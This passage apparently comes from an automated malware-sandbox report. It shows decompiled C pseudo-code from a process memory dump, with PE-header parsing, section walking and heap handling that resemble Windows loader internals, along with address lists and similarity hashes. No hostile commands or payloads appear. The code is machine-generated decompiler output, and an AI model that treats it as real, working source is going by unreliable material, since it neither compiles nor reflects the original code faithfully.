                            																		_push(0x14);
                            																		_push( &_v144);
                            																		_push(3);
                            																		_push(_v44);
                            																		_push(0xffffffff);
                            																		_t319 = E01329730();
                            																		_v36 = _t319;
                            																		__eflags = _t319;
                            																		if(_t319 < 0) {
                            																			_t216 = 0xc000001f;
                            																			_v36 = 0xc000001f;
                            																			_t307 = _v60;
                            																		} else {
                            																			_t307 = _v132;
                            																			L69:
                            																			_v48 = _t307;
                            																			goto L70;
                            																		}
                            																	}
                            																}
                            															}
                            															L71:
                            															_v72 = _t307;
                            															_v84 = _t216;
                            															__eflags = _t216 - 0xc000007b;
                            															if(_t216 == 0xc000007b) {
                            																L150:
                            																_v8 = 0xfffffffe;
                            																_t211 = 0xc000007b;
                            															} else {
                            																_t344 = _t290 & 0xfffffffc;
                            																_v76 = _t344;
                            																__eflags = _v40 - _t344;
                            																if(_v40 <= _t344) {
                            																	goto L150;
                            																} else {
                            																	__eflags = _t307;
                            																	if(_t307 == 0) {
                            																		L75:
                            																		_t217 = 0;
                            																		_v104 = 0;
                            																		__eflags = _t366;
                            																		if(_t366 != 0) {
                            																			__eflags = _t290 & 0x00000001;
                            																			if((_t290 & 0x00000001) != 0) {
                            																				_t217 = 1;
                            																				_v104 = 1;
                            																			}
                            																			_t290 = _v44;
                            																			_v52 = _t290;
                            																		}
                            																		__eflags = _t217 - 1;
                            																		if(_t217 != 1) {
                            																			_t369 = 0;
                            																			_t218 = _v40;
                            																			goto L91;
                            																		} else {
                            																			_v64 = 0;
                            																			E012FE9C0(1, _t290, 0, 0,  &_v64);
                            																			_t309 = _v64;
                            																			_v108 = _t309;
                            																			__eflags = _t309;
                            																			if(_t309 == 0) {
                            																				goto L143;
                            																			} else {
                            																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                            																				__eflags = _t226 - 0x10b;
                            																				if(_t226 != 0x10b) {
                            																					__eflags = _t226 - 0x20b;
                            																					if(_t226 != 0x20b) {
                            																						goto L143;
                            																					} else {
                            																						_t371 =  *(_t309 + 0x98);
                            																						goto L83;
                            																					}
                            																				} else {
                            																					_t371 =  *(_t309 + 0x88);
                            																					L83:
                            																					__eflags = _t371;
                            																					if(_t371 != 0) {
                            																						_v80 = _t371 - _t356 + _t290;
                            																						_t310 = _v64;
                            																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                            																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                            																						_t311 = 0;
                            																						__eflags = 0;
                            																						while(1) {
                            																							_v120 = _t311;
                            																							_v116 = _t348;
                            																							__eflags = _t311 - _t292;
                            																							if(_t311 >= _t292) {
                            																								goto L143;
                            																							}
                            																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                            																							__eflags = _t371 - _t359;
                            																							if(_t371 < _t359) {
                            																								L98:
                            																								_t348 = _t348 + 0x28;
                            																								_t311 = _t311 + 1;
                            																								continue;
                            																							} else {
                            																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                            																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                            																									goto L98;
                            																								} else {
                            																									__eflags = _t348;
                            																									if(_t348 == 0) {
                            																										goto L143;
                            																									} else {
                            																										_t218 = _v40;
                            																										_t312 =  *_t218;
                            																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                            																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                            																											_v100 = _t359;
                            																											_t360 = _v108;
                            																											_t372 = L012F8F44(_v108, _t312);
                            																											__eflags = _t372;
                            																											if(_t372 == 0) {
                            																												goto L143;
                            																											} else {
                            																												_t290 = _v52;
                            																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01323C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                            																												_t307 = _v72;
                            																												_t344 = _v76;
                            																												_t218 = _v40;
                            																												goto L91;
                            																											}
                            																										} else {
                            																											_t290 = _v52;
                            																											_t307 = _v72;
                            																											_t344 = _v76;
                            																											_t369 = _v80;
                            																											L91:
                            																											_t358 = _a4;
                            																											__eflags = _t358;
                            																											if(_t358 == 0) {
                            																												L95:
                            																												_t308 = _a8;
                            																												__eflags = _t308;
                            																												if(_t308 != 0) {
                            																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                            																												}
                            																												_v8 = 0xfffffffe;
                            																												_t211 = _v84;
                            																											} else {
                            																												_t370 =  *_t218 - _t369 + _t290;
                            																												 *_t358 = _t370;
                            																												__eflags = _t370 - _t344;
                            																												if(_t370 <= _t344) {
                            																													L149:
                            																													 *_t358 = 0;
                            																													goto L150;
                            																												} else {
                            																													__eflags = _t307;
                            																													if(_t307 == 0) {
                            																														goto L95;
                            																													} else {
                            																														__eflags = _t370 - _t344 + _t307;
                            																														if(_t370 >= _t344 + _t307) {
                            																															goto L149;
                            																														} else {
                            																															goto L95;
                            																														}
                            																													}
                            																												}
                            																											}
                            																										}
                            																									}
                            																								}
                            																							}
                            																							goto L97;
                            																						}
                            																					}
                            																					goto L143;
                            																				}
                            																			}
                            																		}
                            																	} else {
                            																		__eflags = _v40 - _t307 + _t344;
                            																		if(_v40 >= _t307 + _t344) {
                            																			goto L150;
                            																		} else {
                            																			goto L75;
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            														L97:
                            														 *[fs:0x0] = _v20;
                            														return _t211;
                            													}
                            												}
                            											}
                            										}
                            									} else {
                            										goto L46;
                            									}
                            								}
                            								goto L151;
                            							}
                            							_t288 = _v164;
                            							_t366 = 0xc0000135;
                            							goto L41;
                            						}
                            					}
                            				}
                            				L151:
                            			}
                            0x012fdbdd
                            0x012fdbdf
                            0x00000000
                            0x012fdbe5
                            0x012fdbe5
                            0x012fdbee
                            0x012fdbf1
                            0x0134b541
                            0x0134b544
                            0x00000000
                            0x0134b546
                            0x0134b546
                            0x00000000
                            0x0134b546
                            0x012fdbf7
                            0x012fdbf7
                            0x012fdbfd
                            0x012fdbfd
                            0x012fdbff
                            0x012fdc0b
                            0x012fdc15
                            0x012fdc1b
                            0x012fdc1d
                            0x012fdc21
                            0x012fdc21
                            0x012fdc23
                            0x012fdc23
                            0x012fdc26
                            0x012fdc29
                            0x012fdc2b
                            0x00000000
                            0x00000000
                            0x012fdc31
                            0x012fdc34
                            0x012fdc36
                            0x012fdcbf
                            0x012fdcbf
                            0x012fdcc2
                            0x00000000
                            0x012fdc3c
                            0x012fdc41
                            0x012fdc43
                            0x00000000
                            0x012fdc45
                            0x012fdc45
                            0x012fdc47
                            0x00000000
                            0x012fdc4d
                            0x012fdc4d
                            0x012fdc50
                            0x012fdc52
                            0x012fdc55
                            0x012fdcfa
                            0x012fdcfe
                            0x012fdd08
                            0x012fdd0a
                            0x012fdd0c
                            0x00000000
                            0x012fdd12
                            0x012fdd15
                            0x012fdd2d
                            0x012fdd2f
                            0x012fdd32
                            0x012fdd35
                            0x00000000
                            0x012fdd35
                            0x012fdc5b
                            0x012fdc5b
                            0x012fdc5e
                            0x012fdc61
                            0x012fdc64
                            0x012fdc67
                            0x012fdc67
                            0x012fdc6a
                            0x012fdc6c
                            0x012fdc8e
                            0x012fdc8e
                            0x012fdc91
                            0x012fdc93
                            0x012fdcce
                            0x012fdcce
                            0x012fdc95
                            0x012fdc9c
                            0x012fdc6e
                            0x012fdc72
                            0x012fdc75
                            0x012fdc77
                            0x012fdc79
                            0x0134b551
                            0x0134b551
                            0x00000000
                            0x012fdc7f
                            0x012fdc7f
                            0x012fdc81
                            0x00000000
                            0x012fdc83
                            0x012fdc86
                            0x012fdc88
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012fdc88
                            0x012fdc81
                            0x012fdc79
                            0x012fdc6c
                            0x012fdc55
                            0x012fdc47
                            0x012fdc43
                            0x00000000
                            0x012fdc36
                            0x012fdc23
                            0x00000000
                            0x012fdbff
                            0x012fdbf1
                            0x012fdbdf
                            0x012fdb8f
                            0x012fdb92
                            0x012fdb95
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012fdb95
                            0x012fdb8d
                            0x012fdb85
                            0x012fdb74
                            0x012fdc9f
                            0x012fdca2
                            0x012fdcb0
                            0x012fdcb0
                            0x012fdad1
                            0x0134b4e5
                            0x0134b4c8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012fd831
                            0x00000000
                            0x012fd800
                            0x0134b47f
                            0x0134b485
                            0x00000000
                            0x0134b485
                            0x012fd665
                            0x012fd652
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cf2c4f692f65e1979512bb4296161abed3514bd5479bdc99879818bd68442309
                            • Instruction ID: 6d35a62835eb9b32716265b79b03b339e3a0d668714ecb9652888029c8ff3fce
                            • Opcode Fuzzy Hash: cf2c4f692f65e1979512bb4296161abed3514bd5479bdc99879818bd68442309
                            • Instruction Fuzzy Hash: 17E1DF31A1135ACFEB35CF69C880BA9F7B6BF45308F0401ADDB09AB295D774A981CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E012F849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                            				void* _t136;
                            				signed int _t139;
                            				signed int _t141;
                            				signed int _t145;
                            				intOrPtr _t146;
                            				signed int _t149;
                            				signed int _t150;
                            				signed int _t161;
                            				signed int _t163;
                            				signed int _t165;
                            				signed int _t169;
                            				signed int _t171;
                            				signed int _t194;
                            				signed int _t200;
                            				void* _t201;
                            				signed int _t204;
                            				signed int _t206;
                            				signed int _t210;
                            				signed int _t214;
                            				signed int _t215;
                            				signed int _t218;
                            				void* _t221;
                            				signed int _t224;
                            				signed int _t226;
                            				intOrPtr _t228;
                            				signed int _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				void* _t237;
                            				void* _t238;
                            
                            				_t236 = __esi;
                            				_t235 = __edi;
                            				_t193 = __ebx;
                            				_push(0x70);
                            				_push(0x13bf9c0);
                            				E0133D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                            				if( *0x13d7b04 == 0) {
                            					L4:
                            					goto L5;
                            				} else {
                            					_t136 = E012FCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                            					_t236 = 0;
                            					if(_t136 < 0) {
                            						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                            					}
                            					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                            						_t193 =  *( *[fs:0x30] + 0x18);
                            						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                            						 *(_t237 - 0x68) = _t236;
                            						 *(_t237 - 0x6c) = _t236;
                            						_t235 = _t236;
                            						 *(_t237 - 0x60) = _t236;
                            						E01302280( *[fs:0x30], 0x13d8550);
                            						_t139 =  *0x13d7b04; // 0x1
                            						__eflags = _t139 - 1;
                            						if(__eflags != 0) {
                            							_t200 = 0xc;
                            							_t201 = _t237 - 0x40;
                            							_t141 = E0131F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                            							 *(_t237 - 0x44) = _t141;
                            							__eflags = _t141;
                            							if(_t141 < 0) {
                            								L50:
                            								E012FFFB0(_t193, _t235, 0x13d8550);
                            								L5:
                            								return E0133D130(_t193, _t235, _t236);
                            							}
                            							_push(_t201);
                            							_t221 = 0x10;
                            							_t202 =  *(_t237 - 0x40);
                            							_t145 = E012E1C45( *(_t237 - 0x40), _t221);
                            							 *(_t237 - 0x44) = _t145;
                            							__eflags = _t145;
                            							if(_t145 < 0) {
                            								goto L50;
                            							}
                            							_t146 =  *0x13d7b9c; // 0x0
                            							_t235 = L01304620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                            							 *(_t237 - 0x60) = _t235;
                            							__eflags = _t235;
                            							if(_t235 == 0) {
                            								_t149 = 0xc0000017;
                            								 *(_t237 - 0x44) = 0xc0000017;
                            							} else {
                            								_t149 =  *(_t237 - 0x44);
                            							}
                            							__eflags = _t149;
                            							if(__eflags >= 0) {
                            								L8:
                            								 *(_t237 - 0x64) = _t235;
                            								_t150 =  *0x13d7b10; // 0x0
                            								 *(_t237 - 0x4c) = _t150;
                            								_push(_t237 - 0x74);
                            								_push(_t237 - 0x39);
                            								_push(_t237 - 0x58);
                            								_t193 = E0131A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                            								 *(_t237 - 0x44) = _t193;
                            								__eflags = _t193;
                            								if(_t193 < 0) {
                            									L30:
                            									E012FFFB0(_t193, _t235, 0x13d8550);
                            									__eflags = _t235 - _t237 - 0x38;
                            									if(_t235 != _t237 - 0x38) {
                            										_t235 =  *(_t237 - 0x48);
                            										L013077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                            									} else {
                            										_t235 =  *(_t237 - 0x48);
                            									}
                            									__eflags =  *(_t237 - 0x6c);
                            									if( *(_t237 - 0x6c) != 0) {
                            										L013077F0(_t235, _t236,  *(_t237 - 0x6c));
                            									}
                            									__eflags = _t193;
                            									if(_t193 >= 0) {
                            										goto L4;
                            									} else {
                            										goto L5;
                            									}
                            								}
                            								_t204 =  *0x13d7b04; // 0x1
                            								 *(_t235 + 8) = _t204;
                            								__eflags =  *((char*)(_t237 - 0x39));
                            								if( *((char*)(_t237 - 0x39)) != 0) {
                            									 *(_t235 + 4) = 1;
                            									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                            									_t161 =  *0x13d7b10; // 0x0
                            									 *(_t237 - 0x4c) = _t161;
                            								} else {
                            									 *(_t235 + 4) = _t236;
                            									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                            								}
                            								 *((intOrPtr*)(_t237 - 0x54)) = E013237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                            								_t224 = _t236;
                            								 *(_t237 - 0x40) = _t236;
                            								 *(_t237 - 0x50) = _t236;
                            								while(1) {
                            									_t163 =  *(_t235 + 8);
                            									__eflags = _t224 - _t163;
                            									if(_t224 >= _t163) {
                            										break;
                            									}
                            									_t228 =  *0x13d7b9c; // 0x0
                            									_t214 = L01304620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                            									 *(_t237 - 0x78) = _t214;
                            									__eflags = _t214;
                            									if(_t214 == 0) {
                            										L52:
                            										_t193 = 0xc0000017;
                            										L19:
                            										 *(_t237 - 0x44) = _t193;
                            										L20:
                            										_t206 =  *(_t237 - 0x40);
                            										__eflags = _t206;
                            										if(_t206 == 0) {
                            											L26:
                            											__eflags = _t193;
                            											if(_t193 < 0) {
                            												E013237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                            												__eflags =  *((char*)(_t237 - 0x39));
                            												if( *((char*)(_t237 - 0x39)) != 0) {
                            													 *0x13d7b10 =  *0x13d7b10 - 8;
                            												}
                            											} else {
                            												_t169 =  *(_t237 - 0x68);
                            												__eflags = _t169;
                            												if(_t169 != 0) {
                            													 *0x13d7b04 =  *0x13d7b04 - _t169;
                            												}
                            											}
                            											__eflags = _t193;
                            											if(_t193 >= 0) {
                            												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                            											}
                            											goto L30;
                            										}
                            										_t226 = _t206 * 0xc;
                            										__eflags = _t226;
                            										_t194 =  *(_t237 - 0x48);
                            										do {
                            											 *(_t237 - 0x40) = _t206 - 1;
                            											_t226 = _t226 - 0xc;
                            											 *(_t237 - 0x4c) = _t226;
                            											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                            											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                            												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                            												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                            													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                            													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                            													__eflags =  *((char*)(_t237 - 0x39));
                            													if( *((char*)(_t237 - 0x39)) == 0) {
                            														_t171 = _t210;
                            													} else {
                            														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                            														L013077F0(_t194, _t236, _t210 - 8);
                            														_t171 =  *(_t237 - 0x50);
                            													}
                            													L48:
                            													L013077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                            													L46:
                            													_t206 =  *(_t237 - 0x40);
                            													_t226 =  *(_t237 - 0x4c);
                            													goto L24;
                            												}
                            												 *0x13d7b08 =  *0x13d7b08 + 1;
                            												goto L24;
                            											}
                            											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                            											__eflags = _t171;
                            											if(_t171 != 0) {
                            												__eflags =  *((char*)(_t237 - 0x39));
                            												if( *((char*)(_t237 - 0x39)) == 0) {
                            													goto L48;
                            												}
                            												E013257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                            												goto L46;
                            											}
                            											L24:
                            											__eflags = _t206;
                            										} while (_t206 != 0);
                            										_t193 =  *(_t237 - 0x44);
                            										goto L26;
                            									}
                            									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                            									 *(_t237 - 0x7c) = _t232;
                            									 *(_t232 - 4) = _t214;
                            									 *(_t237 - 4) = _t236;
                            									E0132F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                            									_t238 = _t238 + 0xc;
                            									 *(_t237 - 4) = 0xfffffffe;
                            									_t215 =  *(_t237 - 0x48);
                            									__eflags = _t193;
                            									if(_t193 < 0) {
                            										L013077F0(_t215, _t236,  *(_t237 - 0x78));
                            										goto L20;
                            									}
                            									__eflags =  *((char*)(_t237 - 0x39));
                            									if( *((char*)(_t237 - 0x39)) != 0) {
                            										_t233 = E0131A44B( *(_t237 - 0x4c));
                            										 *(_t237 - 0x50) = _t233;
                            										__eflags = _t233;
                            										if(_t233 == 0) {
                            											L013077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                            											goto L52;
                            										}
                            										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                            										L17:
                            										_t234 =  *(_t237 - 0x40);
                            										_t218 = _t234 * 0xc;
                            										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                            										 *(_t218 + _t235 + 0x10) = _t236;
                            										_t224 = _t234 + 1;
                            										 *(_t237 - 0x40) = _t224;
                            										 *(_t237 - 0x50) = _t224;
                            										_t193 =  *(_t237 - 0x44);
                            										continue;
                            									}
                            									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                            									goto L17;
                            								}
                            								 *_t235 = _t236;
                            								_t165 = 0x10 + _t163 * 0xc;
                            								__eflags = _t165;
                            								_push(_t165);
                            								_push(_t235);
                            								_push(0x23);
                            								_push(0xffffffff);
                            								_t193 = E013296C0();
                            								goto L19;
                            							} else {
                            								goto L50;
                            							}
                            						}
                            						_t235 = _t237 - 0x38;
                            						 *(_t237 - 0x60) = _t235;
                            						goto L8;
                            					}
                            					goto L4;
                            				}
                            			}

































                            0x012f860b
                            0x012f860e
                            0x012f8611
                            0x00000000
                            0x012f8611
                            0x012f85f3
                            0x00000000
                            0x012f85f3
                            0x012f8619
                            0x012f861e
                            0x012f861e
                            0x012f8621
                            0x012f8622
                            0x012f8623
                            0x012f8625
                            0x012f862c
                            0x00000000
                            0x012f873d
                            0x00000000
                            0x012f873d
                            0x012f8737
                            0x012f850f
                            0x012f8512
                            0x00000000
                            0x012f8512
                            0x00000000
                            0x012f84d6

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4346b2259d2d8991abf63d17d7ba627ed4a7387b4cf7d30f3e3fc8d7470081e4
                            • Instruction ID: 96f58b9e2a3502f10973446483786486952d1c3a98e8b1ab09ce377f01e3644e
                            • Opcode Fuzzy Hash: 4346b2259d2d8991abf63d17d7ba627ed4a7387b4cf7d30f3e3fc8d7470081e4
                            • Instruction Fuzzy Hash: 2DB14A74E1020ADFDB29DFA9C984AAEFBB9FF48308F10412DE615AB345D770A945CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E0131513A(intOrPtr __ecx, void* __edx) {
                            				signed int _v8;
                            				signed char _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				char _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				signed int _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				char _v63;
                            				char _v64;
                            				signed int _v72;
                            				signed int _v76;
                            				signed int _v80;
                            				signed int _v84;
                            				signed int _v88;
                            				signed char* _v92;
                            				signed int _v100;
                            				signed int _v104;
                            				char _v105;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t157;
                            				signed int _t159;
                            				signed int _t160;
                            				unsigned int* _t161;
                            				intOrPtr _t165;
                            				signed int _t172;
                            				signed char* _t181;
                            				intOrPtr _t189;
                            				intOrPtr* _t200;
                            				signed int _t202;
                            				signed int _t203;
                            				char _t204;
                            				signed int _t207;
                            				signed int _t208;
                            				void* _t209;
                            				intOrPtr _t210;
                            				signed int _t212;
                            				signed int _t214;
                            				signed int _t221;
                            				signed int _t222;
                            				signed int _t226;
                            				intOrPtr* _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				intOrPtr _t237;
                            				intOrPtr _t238;
                            				intOrPtr _t240;
                            				void* _t245;
                            				signed int _t246;
                            				signed int _t247;
                            				void* _t248;
                            				void* _t251;
                            				void* _t252;
                            				signed int _t253;
                            				signed int _t255;
                            				signed int _t256;
                            
                            				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                            				_v8 =  *0x13dd360 ^ _t255;
                            				_v32 = _v32 & 0x00000000;
                            				_t251 = __edx;
                            				_t237 = __ecx;
                            				_t212 = 6;
                            				_t245 =  &_v84;
                            				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                            				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                            				_v48 = __ecx;
                            				_v36 = _t207;
                            				_t157 = memset(_t245, 0, _t212 << 2);
                            				_t256 = _t255 + 0xc;
                            				_t246 = _t245 + _t212;
                            				if(_t207 == 2) {
                            					_t247 =  *(_t237 + 0x60);
                            					_t208 =  *(_t237 + 0x64);
                            					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                            					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                            					_v104 = _t159;
                            					_v76 = _t159;
                            					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                            					_v100 = _t160;
                            					_v72 = _t160;
                            					L19:
                            					_v80 = _t208;
                            					_v84 = _t247;
                            					L8:
                            					_t214 = 0;
                            					if( *(_t237 + 0x74) > 0) {
                            						_t82 = _t237 + 0x84; // 0x124
                            						_t161 = _t82;
                            						_v92 = _t161;
                            						while( *_t161 >> 0x1f != 0) {
                            							_t200 = _v92;
                            							if( *_t200 == 0x80000000) {
                            								break;
                            							}
                            							_t214 = _t214 + 1;
                            							_t161 = _t200 + 0x10;
                            							_v92 = _t161;
                            							if(_t214 <  *(_t237 + 0x74)) {
                            								continue;
                            							}
                            							goto L9;
                            						}
                            						_v88 = _t214 << 4;
                            						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                            						_t165 = 0;
                            						asm("adc eax, [ecx+edx+0x7c]");
                            						_v24 = _t165;
                            						_v28 = _v40;
                            						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                            						_t221 = _v40;
                            						_v16 =  *_v92;
                            						_v32 =  &_v28;
                            						if( *(_t237 + 0x4e) >> 0xf == 0) {
                            							goto L9;
                            						}
                            						_t240 = _v48;
                            						if( *_v92 != 0x80000000) {
                            							goto L9;
                            						}
                            						 *((intOrPtr*)(_t221 + 8)) = 0;
                            						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                            						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                            						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                            						_t226 = 0;
                            						_t181 = _t251 + 0x66;
                            						_v88 = 0;
                            						_v92 = _t181;
                            						do {
                            							if( *((char*)(_t181 - 2)) == 0) {
                            								goto L31;
                            							}
                            							_t226 = _v88;
                            							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                            								_t181 = E0132D0F0(1, _t226 + 0x20, 0);
                            								_t226 = _v40;
                            								 *(_t226 + 8) = _t181;
                            								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                            								L34:
                            								if(_v44 == 0) {
                            									goto L9;
                            								}
                            								_t210 = _v44;
                            								_t127 = _t210 + 0x1c; // 0x1c
                            								_t249 = _t127;
                            								E01302280(_t181, _t127);
                            								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                            								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                            								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                            									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                            								}
                            								_t189 = L01304620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                            								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                            								if(_t189 != 0) {
                            									 *((intOrPtr*)(_t189 + 8)) = _v20;
                            									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                            									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                            									 *_t232 = _t232 + 0x10;
                            									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                            									E0132F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                            									_t256 = _t256 + 0xc;
                            								}
                            								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                            								E012FFFB0(_t210, _t249, _t249);
                            								_t222 = _v76;
                            								_t172 = _v80;
                            								_t208 = _v84;
                            								_t247 = _v88;
                            								L10:
                            								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                            								_v44 = _t238;
                            								if(_t238 != 0) {
                            									 *0x13db1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                            									_v44();
                            								}
                            								_pop(_t248);
                            								_pop(_t252);
                            								_pop(_t209);
                            								return E0132B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                            							}
                            							_t181 = _v92;
                            							L31:
                            							_t226 = _t226 + 1;
                            							_t181 =  &(_t181[0x18]);
                            							_v88 = _t226;
                            							_v92 = _t181;
                            						} while (_t226 < 4);
                            						goto L34;
                            					}
                            					L9:
                            					_t172 = _v104;
                            					_t222 = _v100;
                            					goto L10;
                            				}
                            				_t247 = _t246 | 0xffffffff;
                            				_t208 = _t247;
                            				_v84 = _t247;
                            				_v80 = _t208;
                            				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                            					_t233 = _v72;
                            					_v105 = _v64;
                            					_t202 = _v76;
                            				} else {
                            					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                            					_v105 = 1;
                            					if(_v63 <= _t204) {
                            						_v63 = _t204;
                            					}
                            					_t202 = _v76 |  *(_t251 + 0x40);
                            					_t233 = _v72 |  *(_t251 + 0x44);
                            					_t247 =  *(_t251 + 0x38);
                            					_t208 =  *(_t251 + 0x3c);
                            					_v76 = _t202;
                            					_v72 = _t233;
                            					_v84 = _t247;
                            					_v80 = _t208;
                            				}
                            				_v104 = _t202;
                            				_v100 = _t233;
                            				if( *((char*)(_t251 + 0xc4)) != 0) {
                            					_t237 = _v48;
                            					_v105 = 1;
                            					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                            						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                            						_t237 = _v48;
                            					}
                            					_t203 = _t202 |  *(_t251 + 0xb8);
                            					_t234 = _t233 |  *(_t251 + 0xbc);
                            					_t247 = _t247 &  *(_t251 + 0xb0);
                            					_t208 = _t208 &  *(_t251 + 0xb4);
                            					_v104 = _t203;
                            					_v76 = _t203;
                            					_v100 = _t234;
                            					_v72 = _t234;
                            					_v84 = _t247;
                            					_v80 = _t208;
                            				}
                            				if(_v105 == 0) {
                            					_v36 = _v36 & 0x00000000;
                            					_t208 = 0;
                            					_t247 = 0;
                            					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                            					goto L19;
                            				} else {
                            					_v36 = 1;
                            					goto L8;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1daa0d10d6fb511daeb8ba247a62725ed5bde0221f7a08fd5c37ea9c737bb023
                            • Instruction ID: 17ebf17d2d0ff1f0194b3f8155e2439772f6d9142b85b2958b4c3b2f1cec2ef7
                            • Opcode Fuzzy Hash: 1daa0d10d6fb511daeb8ba247a62725ed5bde0221f7a08fd5c37ea9c737bb023
                            • Instruction Fuzzy Hash: C3C154B55093818FD355CF28C580A5AFBF1BF89708F544A6EF9998B352D730E845CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
